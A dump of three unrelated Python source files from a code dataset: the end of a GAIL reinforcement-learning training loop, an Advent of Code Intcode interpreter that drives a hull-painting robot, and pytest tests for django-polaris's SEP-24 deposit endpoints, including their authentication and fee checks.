    # Optimize the Agent (once per episode with 16 update steps).
    # NOTE(review): indentation reconstructed -- confirm optimize() belongs
    # after the episode loop rather than inside it.
    agent.optimize(16)
    score_history.append(score)
    avg_score = np.mean(score_history[-100:])
    avg_history.append(avg_score)
    # Save the model whenever the moving average reaches a new best.
    if avg_score > best_score:
        best_score = avg_score
        agent.save_model()
        print(
            f'Episode:{i} \t ACC. Rewards: {score} \t AVG. Rewards: {avg_score:3.2f} \t *** MODEL SAVED! ***')
    else:
        print(
            f'Episode:{i} \t ACC. Rewards: {score} \t AVG. Rewards: {avg_score:3.2f}')
# Save the Training data and Model Loss
np.save(abs_path+'/GAIL/data/score_history',
        score_history, allow_pickle=False)
np.save(abs_path+'/GAIL/data/avg_history', avg_history, allow_pickle=False)
| StarcoderdataPython |
8132090 | # Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import collections
import copy
import operator
import pathlib
import uuid
import numpy as np
import PIL.Image
HERE = pathlib.Path(__file__).resolve().parent
OPCODES = {
1: ("ADD", 3),
2: ("MULTIPLY", 3),
3: ("INPUT", 1),
4: ("OUTPUT", 1),
5: ("JUMP-IF-TRUE", 2),
6: ("JUMP-IF-FALSE", 2),
7: ("LESS-THAN", 3),
8: ("EQUALS", 3),
9: ("ADJUST_BASE", 1),
99: ("HALT", 0),
}
POSITION_MODE = "0"
IMMEDIATE_MODE = "1"
RELATIVE_MODE = "2"
ALL_MODES = set("012")
NO_JUMP_JUMP_INDEX = uuid.uuid4()
TERMINAL_JUMP_INDEX = uuid.uuid4()
COLOR_BLACK = 0
COLOR_WHITE = 1
MAX_PIXEL = 255
TURN_LEFT = np.array([[0, -1], [1, 0]])
TURN_RIGHT = np.array([[0, 1], [-1, 0]])
class AdjustBase:
    """Marker result of opcode 9: carries the relative-base delta to apply."""
    def __init__(self, value):
        self.value = value
def less_than_binary_op(value1, value2):
    """Intcode LESS-THAN semantics: 1 if value1 < value2, else 0."""
    # int(bool) is exactly the 1/0 the original if/else produced.
    return int(value1 < value2)
def equal_binary_op(value1, value2):
    """Intcode EQUALS semantics: 1 if value1 == value2, else 0."""
    # int(bool) is exactly the 1/0 the original if/else produced.
    return int(value1 == value2)
def get_value(mode, param, relative_base, program):
    """Read an operand according to its parameter mode (days 5/9 rules)."""
    if mode == POSITION_MODE:
        # Parameter is an absolute memory address.
        index = param
        assert 0 <= index
        return program[index]
    if mode == IMMEDIATE_MODE:
        # Parameter is the value itself.
        return param
    if mode == RELATIVE_MODE:
        # Parameter is an offset from the current relative base.
        index = relative_base + param
        assert 0 <= index
        return program[index]
    raise ValueError("Invalid mode", mode)


def set_value(mode, param, to_store, relative_base, program):
    """Write ``to_store`` at the address named by the parameter.

    Immediate mode is not a valid destination for writes.
    """
    if mode == POSITION_MODE:
        index = param
        assert 0 <= index
        program[index] = to_store
        return
    if mode == RELATIVE_MODE:
        index = relative_base + param
        assert 0 <= index
        program[index] = to_store
        return
    raise ValueError("Invalid mode", mode)
def _do_binary_op(modes, params, relative_base, program, fn):
    """Apply binary ``fn`` to the first two operands, store at the third."""
    mode1, mode2, mode3 = modes
    param1, param2, param3 = params
    value1 = get_value(mode1, param1, relative_base, program)
    value2 = get_value(mode2, param2, relative_base, program)
    to_store = fn(value1, value2)
    set_value(mode3, param3, to_store, relative_base, program)
    return NO_JUMP_JUMP_INDEX


def do_add(modes, params, relative_base, program):
    """Opcode 1: addition."""
    return _do_binary_op(modes, params, relative_base, program, operator.add)


def do_multiply(modes, params, relative_base, program):
    """Opcode 2: multiplication."""
    return _do_binary_op(modes, params, relative_base, program, operator.mul)


def do_input(modes, params, relative_base, program, std_input):
    """Opcode 3: store the next value pulled from the input iterator."""
    mode, = modes
    param, = params
    to_store = next(std_input)
    set_value(mode, param, to_store, relative_base, program)
    return NO_JUMP_JUMP_INDEX


def do_output(modes, params, relative_base, program, std_output):
    """Opcode 4: append an operand's value to the output sink."""
    mode, = modes
    param, = params
    value = get_value(mode, param, relative_base, program)
    std_output.append(value)
    return NO_JUMP_JUMP_INDEX


def _do_jump_unary_predicate(modes, params, relative_base, program, fn):
    """Return the second operand as jump target when ``fn(first)`` holds."""
    mode1, mode2 = modes
    param1, param2 = params
    value1 = get_value(mode1, param1, relative_base, program)
    value2 = get_value(mode2, param2, relative_base, program)
    if fn(value1):
        return value2
    return NO_JUMP_JUMP_INDEX


def do_jump_if_true(modes, params, relative_base, program):
    """Opcode 5: jump when the first operand is non-zero."""
    return _do_jump_unary_predicate(
        modes, params, relative_base, program, operator.truth
    )


def do_jump_if_false(modes, params, relative_base, program):
    """Opcode 6: jump when the first operand is zero."""
    return _do_jump_unary_predicate(
        modes, params, relative_base, program, operator.not_
    )


def do_less_than(modes, params, relative_base, program):
    """Opcode 7: store 1/0 for a less-than comparison."""
    return _do_binary_op(
        modes, params, relative_base, program, less_than_binary_op
    )


def do_equal(modes, params, relative_base, program):
    """Opcode 8: store 1/0 for an equality comparison."""
    return _do_binary_op(
        modes, params, relative_base, program, equal_binary_op
    )


def do_adjust_base(modes, params, relative_base, program):
    """Opcode 9: wrap the relative-base delta for the main loop to apply."""
    mode, = modes
    param, = params
    value = get_value(mode, param, relative_base, program)
    return AdjustBase(value)


def do_halt():
    """Opcode 99: signal termination via the sentinel jump index."""
    return TERMINAL_JUMP_INDEX
def next_instruction(index, program):
    """Decode the instruction at ``index``.

    Returns:
        ``(instruction, modes, params, next_index)`` where ``modes`` holds
        one mode character per parameter, in parameter order.
    """
    assert 0 <= index
    op_code_with_extra = program[index]
    assert op_code_with_extra >= 0
    # The last two decimal digits are the opcode; the rest encode the modes.
    mode_as_int, op_code = divmod(op_code_with_extra, 100)
    instruction, num_params = OPCODES[op_code]
    next_index = index + 1 + num_params
    if num_params == 0:
        assert mode_as_int == 0
        return instruction, (), (), next_index
    mode_chars = str(mode_as_int).zfill(num_params)
    assert len(mode_chars) == num_params, (mode_chars, num_params)
    assert set(mode_chars) <= ALL_MODES
    # Modes are written most-significant-first; reverse into parameter order.
    modes = tuple(reversed(mode_chars))
    params = tuple(program[i] for i in range(index + 1, next_index))
    assert len(params) == num_params  # No partial slice
    return instruction, modes, params, next_index
def execute_instruction(
    instruction, modes, params, relative_base, program, std_input, std_output
):
    """Dispatch one decoded instruction to its handler.

    Returns the handler's jump result: a jump index, a sentinel
    (NO_JUMP_JUMP_INDEX / TERMINAL_JUMP_INDEX) or an AdjustBase wrapper.
    """
    if instruction == "ADD":
        return do_add(modes, params, relative_base, program)
    if instruction == "MULTIPLY":
        return do_multiply(modes, params, relative_base, program)
    if instruction == "INPUT":
        return do_input(modes, params, relative_base, program, std_input)
    if instruction == "OUTPUT":
        return do_output(modes, params, relative_base, program, std_output)
    if instruction == "JUMP-IF-TRUE":
        return do_jump_if_true(modes, params, relative_base, program)
    if instruction == "JUMP-IF-FALSE":
        return do_jump_if_false(modes, params, relative_base, program)
    if instruction == "LESS-THAN":
        return do_less_than(modes, params, relative_base, program)
    if instruction == "EQUALS":
        return do_equal(modes, params, relative_base, program)
    if instruction == "ADJUST_BASE":
        return do_adjust_base(modes, params, relative_base, program)
    if instruction == "HALT":
        return do_halt()
    raise ValueError("Bad instruction", instruction, modes, params, program)
def run_intcode(program, std_input, std_output):
    """Run an Intcode program to completion.

    Args:
        program: Mapping of address -> value; copied, the input is untouched.
        std_input: Iterator yielding values for INPUT instructions.
        std_output: Object with ``append`` receiving OUTPUT values.

    Returns:
        The final (mutated copy of the) program memory.
    """
    relative_base = 0
    running_program = copy.deepcopy(program)
    jump_index = NO_JUMP_JUMP_INDEX
    index = 0
    while jump_index != TERMINAL_JUMP_INDEX:
        instruction, modes, params, index = next_instruction(
            index, running_program
        )
        jump_index = execute_instruction(
            instruction,
            modes,
            params,
            relative_base,
            running_program,
            std_input,
            std_output,
        )
        if isinstance(jump_index, AdjustBase):
            # Opcode 9: shift the relative base, no jump.
            relative_base += jump_index.value
        elif jump_index in (NO_JUMP_JUMP_INDEX, TERMINAL_JUMP_INDEX):
            # Nothing to do here, all good.
            pass
        elif jump_index >= 0:
            index = jump_index
        else:
            raise ValueError("Invalid jump index", jump_index)
    return running_program
class Robot:
    """Hull-painting robot acting as both stdin and stdout of the program.

    ``__next__`` feeds the camera reading (current panel color) to INPUT;
    ``append`` consumes OUTPUT pairs of (paint color, turn direction),
    paints the current panel, turns, and advances one step.
    """
    def __init__(self, start_color):
        assert start_color in (COLOR_BLACK, COLOR_WHITE)
        self.input_index = 0
        self.std_input = [start_color]  # Seed first panel
        self.std_output = []
        # (x, y) -> list of colors painted there, in order.
        self.panels = collections.defaultdict(list)
        # Position and direction as 2x1 column vectors; start facing "up".
        self.position = np.array([[0], [0]])
        self.direction = np.array([[0], [1]])
    def __iter__(self):
        return self
    def __next__(self):
        # NOTE: This is not thread-safe
        curr_index = self.input_index
        self.input_index = curr_index + 1
        return self.std_input[curr_index]
    def append(self, value):
        # NOTE: This is not thread-safe
        self.std_output.append(value)
        # Outputs arrive in pairs: act only on every second value.
        if len(self.std_output) % 2 == 0:
            color, direction_int = self.std_output[-2:]
            assert color in (COLOR_BLACK, COLOR_WHITE)
            # Paint the current panel.
            self.panels[tuple(self.position.flatten())].append(color)
            # Turn the robot
            if direction_int == 0:
                self.direction = TURN_LEFT.dot(self.direction)
            elif direction_int == 1:
                self.direction = TURN_RIGHT.dot(self.direction)
            else:
                raise ValueError("Invalid direction", direction_int)
            # Advance the robot
            self.position += self.direction
            # Get current paint color of new position
            colors = self.panels[tuple(self.position.flatten())]
            if colors:
                curr_color = colors[-1]
            else:
                curr_color = COLOR_BLACK
            # Add the color to inputs.
            self.std_input.append(curr_color)
def paint_hull(program, start_color):
    """Run the painting program and return the robot holding the painted hull.

    The robot plays both I/O roles: it supplies camera readings through the
    iterator protocol and consumes paint/turn commands through ``append``.
    """
    hull_robot = Robot(start_color)
    run_intcode(program, hull_robot, hull_robot)
    return hull_robot
def main():
    """Solve both puzzle parts and write the rendered hull image to disk."""
    filename = HERE / "input.txt"
    with open(filename, "r") as file_obj:
        content = file_obj.read()
    # Intcode memory is sparse; defaultdict(int) lets the program address
    # cells past the end of the initial listing (they read as 0).
    program = collections.defaultdict(int)
    for index, value in enumerate(content.strip().split(",")):
        program[index] = int(value)
    # Part 1: start on black and count panels painted at least once.
    robot = paint_hull(program, COLOR_BLACK)
    count = sum(1 for colors in robot.panels.values() if colors)
    print(f"Number of painted panels when starting with Black: {count}")
    # Part 2: start on white and render the painted region as an image.
    robot = paint_hull(program, COLOR_WHITE)
    all_indices = np.array(list(robot.panels.keys()))
    min_x = min(all_indices[:, 0])
    max_x = max(all_indices[:, 0])
    min_y = min(all_indices[:, 1])
    max_y = max(all_indices[:, 1])
    width_x = max_x - min_x + 1
    width_y = max_y - min_y + 1
    # All-COLOR_BLACK canvas sized to the painted bounding box.
    painted = COLOR_BLACK * np.ones((width_x, width_y), dtype=np.uint8)
    for position, colors in robot.panels.items():
        if not colors:
            continue
        # NOTE(review): assumes each visited panel was painted exactly once
        # in part 2 -- the assert will fire otherwise.
        assert len(colors) == 1
        color = colors[0]
        assert color in (COLOR_BLACK, COLOR_WHITE)
        x, y = position
        # Shift so the smallest painted coordinate maps to array index 0.
        shifted_x = x - min_x
        shifted_y = y - min_y
        assert 0 <= shifted_x < width_x
        assert 0 <= shifted_y < width_y
        painted[shifted_x, shifted_y] = color
    # Swap rows and columns
    painted = painted.T
    # Invert rows
    painted = painted[::-1, :]
    # Swap white and black and scale up to highest pixel intensity.
    image = PIL.Image.fromarray(MAX_PIXEL - MAX_PIXEL * painted)
    image.save(HERE / "image.png")


if __name__ == "__main__":
    main()
| StarcoderdataPython |
3294671 | <reponame>stfung77/django-polaris
"""
This module tests the `/deposit` endpoint.
Celery tasks are called synchronously. Horizon calls are mocked for speed and correctness.
"""
import json
from unittest.mock import patch
import jwt
import time
import pytest
from stellar_sdk import Keypair, MuxedAccount
from polaris import settings
from polaris.models import Transaction, Asset
from polaris.integrations import TransactionForm
from polaris.tests.helpers import (
mock_check_auth_success,
mock_check_auth_success_client_domain,
mock_check_auth_success_muxed_account,
mock_check_auth_success_with_memo,
interactive_jwt_payload,
TEST_MUXED_ACCOUNT,
TEST_ACCOUNT_MEMO,
)
# Interactive-flow endpoints exercised throughout this module.
WEBAPP_PATH = "/sep24/transactions/deposit/webapp"
DEPOSIT_PATH = "/sep24/transactions/deposit/interactive"
# Canned Horizon transaction-submission response used when mocking
# stellar_sdk server calls.
HORIZON_SUCCESS_RESPONSE = {
    "successful": True,
    "id": "test_stellar_id",
    "paging_token": "123456789",
    "envelope_xdr": "",  # doesn't need to be populated, for now
}
# Variant that also carries a result_xdr -- presumably for claimable-balance
# tests (the XDR payload here is partially redacted).
HORIZON_SUCCESS_RESPONSE_CLAIM = {
    "successful": True,
    "id": "test_stellar_id",
    "paging_token": "123456789",
    "result_xdr": "AAAAAAAAAGQAAAAAAAAAAQAAAAAAAAAOAAAAAAAAAAAyBzvi/vP0Bih6bAqRNkiutMVUkW1S+WtuITJAA<KEY>A=",
    "envelope_xdr": "",  # doesn't need to be populated for now
}
# Test client account and seed
client_address = "GDKFNRUATPH4BSZGVFDRBIGZ5QAFILVFRIRYNSQ4UO7V2ZQAPRNL73RI"
client_seed = "<KEY>"
@pytest.mark.django_db
@patch("polaris.sep10.utils.check_auth", mock_check_auth_success)
def test_deposit_success(client, acc1_usd_deposit_transaction_factory):
    """`POST /transactions/deposit/interactive` succeeds with no optional arguments."""
    deposit = acc1_usd_deposit_transaction_factory()
    response = client.post(
        DEPOSIT_PATH,
        {"asset_code": "USD", "account": deposit.stellar_account, "amount": 100},
    )
    content = json.loads(response.content)
    # NOTE(review): assumes Transaction.objects.first() returns the
    # transaction created by the view, not the factory one -- confirm ordering.
    t = Transaction.objects.first()
    assert content["type"] == "interactive_customer_info_needed"
    assert "100" in content["url"]
    # Amounts stay unset until the interactive flow completes.
    assert t.amount_in is None
    assert t.amount_out is None
    assert t.amount_fee is None
    assert t.kind == Transaction.KIND.deposit
    assert t.protocol == Transaction.PROTOCOL.sep24
    assert t.status == Transaction.STATUS.incomplete
    # The mocked SEP-10 auth reports "test source address" as the source.
    assert t.stellar_account == "test source address"
    assert t.asset == deposit.asset
    assert t.started_at
    assert t.completed_at is None
    assert t.from_address is None
    assert t.to_address == deposit.stellar_account
    assert t.memo is None
    assert t.claimable_balance_supported is False
@pytest.mark.django_db
@patch("polaris.sep10.utils.check_auth", mock_check_auth_success_muxed_account)
def test_deposit_success_muxed_account(client):
asset = Asset.objects.create(
code="USD",
issuer=Keypair.random().public_key,
sep24_enabled=True,
deposit_enabled=True,
)
response = client.post(
DEPOSIT_PATH,
{"asset_code": "USD", "account": TEST_MUXED_ACCOUNT, "amount": 100},
)
content = json.loads(response.content)
t = Transaction.objects.first()
assert content["type"] == "interactive_customer_info_needed"
assert "100" in content["url"]
assert t.amount_in is None
assert t.amount_out is None
assert t.amount_fee is None
assert t.kind == Transaction.KIND.deposit
assert t.protocol == Transaction.PROTOCOL.sep24
assert t.status == Transaction.STATUS.incomplete
assert t.stellar_account == MuxedAccount.from_account(TEST_MUXED_ACCOUNT).account_id
assert t.muxed_account == TEST_MUXED_ACCOUNT
assert t.account_memo is None
assert t.asset == asset
assert t.started_at
assert t.completed_at is None
assert t.from_address is None
assert t.to_address == TEST_MUXED_ACCOUNT
assert t.memo is None
assert t.claimable_balance_supported is False
@pytest.mark.django_db
@patch("polaris.sep10.utils.check_auth", mock_check_auth_success_with_memo)
def test_deposit_success_with_auth_memo(client):
    """`POST /transactions/deposit/interactive` records the SEP-10 auth memo
    on the created transaction."""
    asset = Asset.objects.create(
        code="USD",
        issuer=Keypair.random().public_key,
        sep24_enabled=True,
        deposit_enabled=True,
    )
    to_address = Keypair.random().public_key
    response = client.post(
        DEPOSIT_PATH,
        {"asset_code": "USD", "account": to_address, "amount": 100},
    )
    content = json.loads(response.content)
    t = Transaction.objects.first()
    assert content["type"] == "interactive_customer_info_needed"
    assert "100" in content["url"]
    # Amounts stay unset until the interactive flow completes.
    assert t.amount_in is None
    assert t.amount_out is None
    assert t.amount_fee is None
    assert t.kind == Transaction.KIND.deposit
    assert t.protocol == Transaction.PROTOCOL.sep24
    assert t.status == Transaction.STATUS.incomplete
    assert t.stellar_account == "test source address"
    assert t.muxed_account is None
    # Compare by value: the previous ``is`` check only passed via CPython's
    # object interning and would break for larger memo values.
    assert t.account_memo == TEST_ACCOUNT_MEMO
    assert t.asset == asset
    assert t.started_at
    assert t.completed_at is None
    assert t.from_address is None
    assert t.to_address == to_address
    assert t.memo is None
    assert t.claimable_balance_supported is False
@pytest.mark.django_db
@patch("polaris.sep10.utils.check_auth", mock_check_auth_success)
def test_deposit_no_params(client):
"""`POST /transactions/deposit/interactive` fails with no required parameters."""
# Because this test does not use the database, the changed setting
# earlier in the file is not persisted when the tests not requiring
# a database are run. Thus, we set that flag again here.
response = client.post(DEPOSIT_PATH, {}, follow=True)
content = json.loads(response.content)
assert response.status_code == 400
assert content == {"error": "`asset_code` and `account` are required parameters"}
@patch("polaris.sep10.utils.check_auth", mock_check_auth_success)
def test_deposit_no_account(client):
"""`POST /transactions/deposit/interactive` fails with no `account` parameter."""
response = client.post(DEPOSIT_PATH, {"asset_code": "NADA"}, follow=True)
content = json.loads(response.content)
assert response.status_code == 400
assert content == {"error": "`asset_code` and `account` are required parameters"}
@pytest.mark.django_db
@patch("polaris.sep10.utils.check_auth", mock_check_auth_success)
def test_deposit_no_asset(client, acc1_usd_deposit_transaction_factory):
"""`POST /transactions/deposit/interactive` fails with no `asset_code` parameter."""
deposit = acc1_usd_deposit_transaction_factory()
response = client.post(
DEPOSIT_PATH, {"account": deposit.stellar_account}, follow=True
)
content = json.loads(response.content)
assert response.status_code == 400
assert content == {"error": "`asset_code` and `account` are required parameters"}
@pytest.mark.django_db
@patch("polaris.sep10.utils.check_auth", mock_check_auth_success)
def test_deposit_invalid_account(client, acc1_usd_deposit_transaction_factory):
"""`POST /transactions/deposit/interactive` fails with an invalid `account` parameter."""
acc1_usd_deposit_transaction_factory()
response = client.post(
DEPOSIT_PATH,
{
"asset_code": "USD",
"account": "<KEY>",
},
follow=True,
)
content = json.loads(response.content)
assert response.status_code == 400
assert content == {"error": "invalid 'account'"}
@pytest.mark.django_db
@patch("polaris.sep10.utils.check_auth", mock_check_auth_success)
def test_deposit_invalid_asset(client, acc1_usd_deposit_transaction_factory):
"""`POST /transactions/deposit/interactive` fails with an invalid `asset_code` parameter."""
deposit = acc1_usd_deposit_transaction_factory()
response = client.post(
DEPOSIT_PATH,
{"asset_code": "GBP", "account": deposit.stellar_account},
follow=True,
)
content = json.loads(response.content)
assert response.status_code == 400
assert content == {"error": "unknown asset: GBP"}
@pytest.mark.django_db
@patch("polaris.sep10.utils.check_auth", mock_check_auth_success)
def test_deposit_invalid_amount(client):
usd = Asset.objects.create(
code="USD",
issuer=Keypair.random().public_key,
sep24_enabled=True,
deposit_enabled=True,
distribution_seed=Keypair.random().secret,
deposit_max_amount=1000,
)
response = client.post(
DEPOSIT_PATH,
{
"asset_code": usd.code,
"account": Keypair.random().public_key,
"amount": 10000,
},
follow=True,
)
assert response.status_code == 400
assert response.json()["error"] == "invalid 'amount'"
@pytest.mark.django_db
def test_deposit_no_jwt(client, acc1_usd_deposit_transaction_factory):
"""`GET /deposit` fails if a required JWT isn't provided."""
deposit = acc1_usd_deposit_transaction_factory()
response = client.post(
DEPOSIT_PATH,
{
"asset_code": "USD",
"account": deposit.stellar_account,
"memo_type": "text",
"memo": "foo",
},
follow=True,
)
content = json.loads(response.content)
assert response.status_code == 403
assert content == {"error": "JWT must be passed as 'Authorization' header"}
@pytest.mark.django_db
def test_interactive_deposit_no_token(client):
"""
`GET /deposit/webapp` fails without token argument
The endpoint returns HTML so we cannot extract the error message from the
response.
"""
response = client.get(WEBAPP_PATH)
assert "Missing authentication token" in str(response.content)
assert response.status_code == 403
@pytest.mark.django_db
def test_interactive_deposit_bad_issuer(client, acc1_usd_deposit_transaction_factory):
deposit = acc1_usd_deposit_transaction_factory()
payload = interactive_jwt_payload(deposit, "deposit")
payload["iss"] = "bad iss"
token = jwt.encode(payload, settings.SERVER_JWT_KEY, algorithm="HS256")
response = client.get(f"{WEBAPP_PATH}?token={token}")
assert "Invalid token issuer" in str(response.content)
assert response.status_code == 403
@pytest.mark.django_db
def test_interactive_deposit_past_exp(client, acc1_usd_deposit_transaction_factory):
deposit = acc1_usd_deposit_transaction_factory()
payload = interactive_jwt_payload(deposit, "deposit")
payload["exp"] = time.time()
token = jwt.encode(payload, settings.SERVER_JWT_KEY, algorithm="HS256")
response = client.get(f"{WEBAPP_PATH}?token={token}")
assert "Token is not yet valid or is expired" in str(response.content)
assert response.status_code == 403
@pytest.mark.django_db
def test_interactive_deposit_no_transaction(
client, acc1_usd_deposit_transaction_factory
):
deposit = acc1_usd_deposit_transaction_factory()
payload = interactive_jwt_payload(deposit, "deposit")
deposit.delete() # remove from database
token = jwt.encode(payload, settings.SERVER_JWT_KEY, algorithm="HS256")
response = client.get(f"{WEBAPP_PATH}?token={token}")
assert "Transaction for account not found" in str(response.content)
assert response.status_code == 403
@pytest.mark.django_db
def test_interactive_deposit_success(client, acc1_usd_deposit_transaction_factory):
deposit = acc1_usd_deposit_transaction_factory()
deposit.amount_in = None
deposit.save()
payload = interactive_jwt_payload(deposit, "deposit")
token = jwt.encode(payload, settings.SERVER_JWT_KEY, algorithm="HS256")
response = client.get(
f"{WEBAPP_PATH}"
f"?token={token}"
f"&transaction_id={deposit.id}"
f"&asset_code={deposit.asset.code}"
)
assert response.status_code == 200
assert client.session["authenticated"] is True
response = client.get(
f"{WEBAPP_PATH}"
f"?token={token}"
f"&transaction_id={deposit.id}"
f"&asset_code={deposit.asset.code}"
)
assert response.status_code == 403
assert "Unexpected one-time auth token" in str(response.content)
response = client.post(
f"{WEBAPP_PATH}/submit"
f"?transaction_id={deposit.id}"
f"&asset_code={deposit.asset.code}",
{"amount": 200.0},
)
assert response.status_code == 302
assert client.session["authenticated"] is False
deposit.refresh_from_db()
assert deposit.status == Transaction.STATUS.pending_user_transfer_start
assert deposit.amount_in == 200
assert deposit.amount_expected == 200
assert deposit.amount_fee == 7
assert deposit.amount_out == 193
@pytest.mark.django_db
@patch("polaris.sep24.deposit.settings.ADDITIVE_FEES_ENABLED", True)
def test_interactive_deposit_success_additive_fees(
client, acc1_usd_deposit_transaction_factory
):
deposit = acc1_usd_deposit_transaction_factory()
deposit.amount_in = None
deposit.save()
payload = interactive_jwt_payload(deposit, "deposit")
token = jwt.encode(payload, settings.SERVER_JWT_KEY, algorithm="HS256")
response = client.get(
f"{WEBAPP_PATH}"
f"?token={token}"
f"&transaction_id={deposit.id}"
f"&asset_code={deposit.asset.code}"
)
assert response.status_code == 200
assert client.session["authenticated"] is True
response = client.get(
f"{WEBAPP_PATH}"
f"?token={token}"
f"&transaction_id={deposit.id}"
f"&asset_code={deposit.asset.code}"
)
assert response.status_code == 403
assert "Unexpected one-time auth token" in str(response.content)
response = client.post(
f"{WEBAPP_PATH}/submit"
f"?transaction_id={deposit.id}"
f"&asset_code={deposit.asset.code}",
{"amount": 200.0},
)
assert response.status_code == 302
assert client.session["authenticated"] is False
deposit.refresh_from_db()
assert deposit.status == Transaction.STATUS.pending_user_transfer_start
assert deposit.amount_in == 207
assert deposit.amount_expected == 207
assert deposit.amount_fee == 7
assert deposit.amount_out == 200
@pytest.mark.django_db
@patch("polaris.sep24.deposit.rdi.after_form_validation")
def test_interactive_deposit_pending_anchor(
mock_after_form_validation, client, acc1_usd_deposit_transaction_factory
):
deposit = acc1_usd_deposit_transaction_factory()
deposit.amount_in = None
deposit.save()
payload = interactive_jwt_payload(deposit, "deposit")
token = jwt.encode(payload, settings.SERVER_JWT_KEY, algorithm="HS256")
response = client.get(
f"{WEBAPP_PATH}"
f"?token={token}"
f"&transaction_id={deposit.id}"
f"&asset_code={deposit.asset.code}"
)
assert response.status_code == 200
assert client.session["authenticated"] is True
response = client.get(
f"{WEBAPP_PATH}"
f"?token={token}"
f"&transaction_id={deposit.id}"
f"&asset_code={deposit.asset.code}"
)
assert response.status_code == 403
assert "Unexpected one-time auth token" in str(response.content)
def mark_as_pending_anchor(transaction, **_kwargs):
transaction.status = Transaction.STATUS.pending_anchor
transaction.save()
mock_after_form_validation.side_effect = mark_as_pending_anchor
response = client.post(
f"{WEBAPP_PATH}/submit"
f"?transaction_id={deposit.id}"
f"&asset_code={deposit.asset.code}",
{"amount": 200.0},
)
assert response.status_code == 302
assert client.session["authenticated"] is False
deposit.refresh_from_db()
assert deposit.status == Transaction.STATUS.pending_anchor
@pytest.mark.django_db
def test_interactive_deposit_bad_post_data(client):
usd = Asset.objects.create(
code="USD",
issuer=Keypair.random().public_key,
sep24_enabled=True,
deposit_enabled=True,
deposit_max_amount=10000,
)
deposit = Transaction.objects.create(
asset=usd,
kind=Transaction.KIND.deposit,
protocol=Transaction.PROTOCOL.sep24,
)
payload = interactive_jwt_payload(deposit, "deposit")
token = jwt.encode(payload, settings.SERVER_JWT_KEY, algorithm="HS256")
response = client.get(
f"{WEBAPP_PATH}"
f"?token={token}"
f"&transaction_id={deposit.id}"
f"&asset_code={deposit.asset.code}"
)
assert response.status_code == 200
assert client.session["authenticated"] is True
response = client.post(
f"{WEBAPP_PATH}/submit"
f"?transaction_id={deposit.id}"
f"&asset_code={deposit.asset.code}",
{"amount": 20000},
)
assert response.status_code == 400
@pytest.mark.django_db
def test_interactive_auth_new_transaction(client, acc1_usd_deposit_transaction_factory):
"""
Tests that requests by previously authenticated accounts are denied if they
were not authenticated for the specified transaction.
"""
deposit = acc1_usd_deposit_transaction_factory()
# So that form_for_transaction() returns TransactionForm
deposit.amount_in = None
deposit.save()
payload = interactive_jwt_payload(deposit, "deposit")
token = jwt.encode(payload, settings.SERVER_JWT_KEY, algorithm="HS256")
response = client.get(
f"{WEBAPP_PATH}"
f"?token={token}"
f"&transaction_id={deposit.id}"
f"&asset_code={deposit.asset.code}"
)
assert response.status_code == 200
assert client.session["authenticated"] is True
new_deposit = acc1_usd_deposit_transaction_factory()
response = client.get(
f"{WEBAPP_PATH}"
f"?transaction_id={new_deposit.id}"
f"&asset_code={new_deposit.asset.code}"
)
assert response.status_code == 403
@pytest.mark.django_db
@patch("polaris.sep24.deposit.rdi.form_for_transaction")
@patch("polaris.sep24.deposit.rdi.content_for_template")
def test_interactive_deposit_get_no_content_tx_incomplete(
    mock_content_for_template, mock_form_for_transaction, client
):
    """GET on the webapp returns 500 when the anchor supplies neither a form
    nor template content for a still-incomplete transaction.

    With stacked ``@patch`` decorators the bottom-most patch is passed first,
    so the first parameter is the ``content_for_template`` mock; it was
    previously misnamed ``mock_content_for_transaction`` (siblings below use
    the correct name).
    """
    usd = Asset.objects.create(
        code="USD",
        issuer=Keypair.random().public_key,
        sep24_enabled=True,
        deposit_enabled=True,
    )
    deposit = Transaction.objects.create(
        asset=usd, kind=Transaction.KIND.deposit, status=Transaction.STATUS.incomplete
    )
    mock_form_for_transaction.return_value = None
    mock_content_for_template.return_value = None
    payload = interactive_jwt_payload(deposit, "deposit")
    token = jwt.encode(payload, settings.SERVER_JWT_KEY, algorithm="HS256")
    response = client.get(
        f"{WEBAPP_PATH}"
        f"?token={token}"
        f"&transaction_id={deposit.id}"
        f"&asset_code={usd.code}"
    )
    assert response.status_code == 500
    # Django does not save session changes on 500 errors
    assert not client.session.get("authenticated")
    assert "The anchor did not provide content, unable to serve page." in str(
        response.content
    )
@pytest.mark.django_db
@patch("polaris.sep24.deposit.rdi.form_for_transaction")
@patch("polaris.sep24.deposit.rdi.content_for_template")
def test_interactive_deposit_get_no_content_tx_complete(
    mock_content_for_template, mock_form_for_transaction, client
):
    """GET on the webapp returns 422 when the anchor supplies no content but
    the transaction has already completed.

    With stacked ``@patch`` decorators the bottom-most patch is passed first,
    so the first parameter is the ``content_for_template`` mock; it was
    previously misnamed ``mock_content_for_transaction`` (siblings below use
    the correct name).
    """
    usd = Asset.objects.create(
        code="USD",
        issuer=Keypair.random().public_key,
        sep24_enabled=True,
        deposit_enabled=True,
    )
    deposit = Transaction.objects.create(
        asset=usd, kind=Transaction.KIND.deposit, status=Transaction.STATUS.completed
    )
    mock_form_for_transaction.return_value = None
    mock_content_for_template.return_value = None
    payload = interactive_jwt_payload(deposit, "deposit")
    token = jwt.encode(payload, settings.SERVER_JWT_KEY, algorithm="HS256")
    response = client.get(
        f"{WEBAPP_PATH}"
        f"?token={token}"
        f"&transaction_id={deposit.id}"
        f"&asset_code={usd.code}"
    )
    assert response.status_code == 422
    assert client.session["authenticated"] is True
    assert (
        "The anchor did not provide content, is the interactive flow already complete?"
        in str(response.content)
    )
@pytest.mark.django_db
@patch("polaris.sep24.deposit.rdi.form_for_transaction")
@patch("polaris.sep24.deposit.rdi.content_for_template")
def test_interactive_deposit_post_no_content_tx_incomplete(
mock_content_for_template, mock_form_for_transaction, client
):
usd = Asset.objects.create(
code="USD",
issuer=Keypair.random().public_key,
sep24_enabled=True,
deposit_enabled=True,
)
deposit = Transaction.objects.create(
asset=usd, kind=Transaction.KIND.deposit, status=Transaction.STATUS.incomplete
)
mock_form_for_transaction.return_value = None
mock_content_for_template.return_value = {"test": "value"}
payload = interactive_jwt_payload(deposit, "deposit")
token = jwt.encode(payload, settings.SERVER_JWT_KEY, algorithm="HS256")
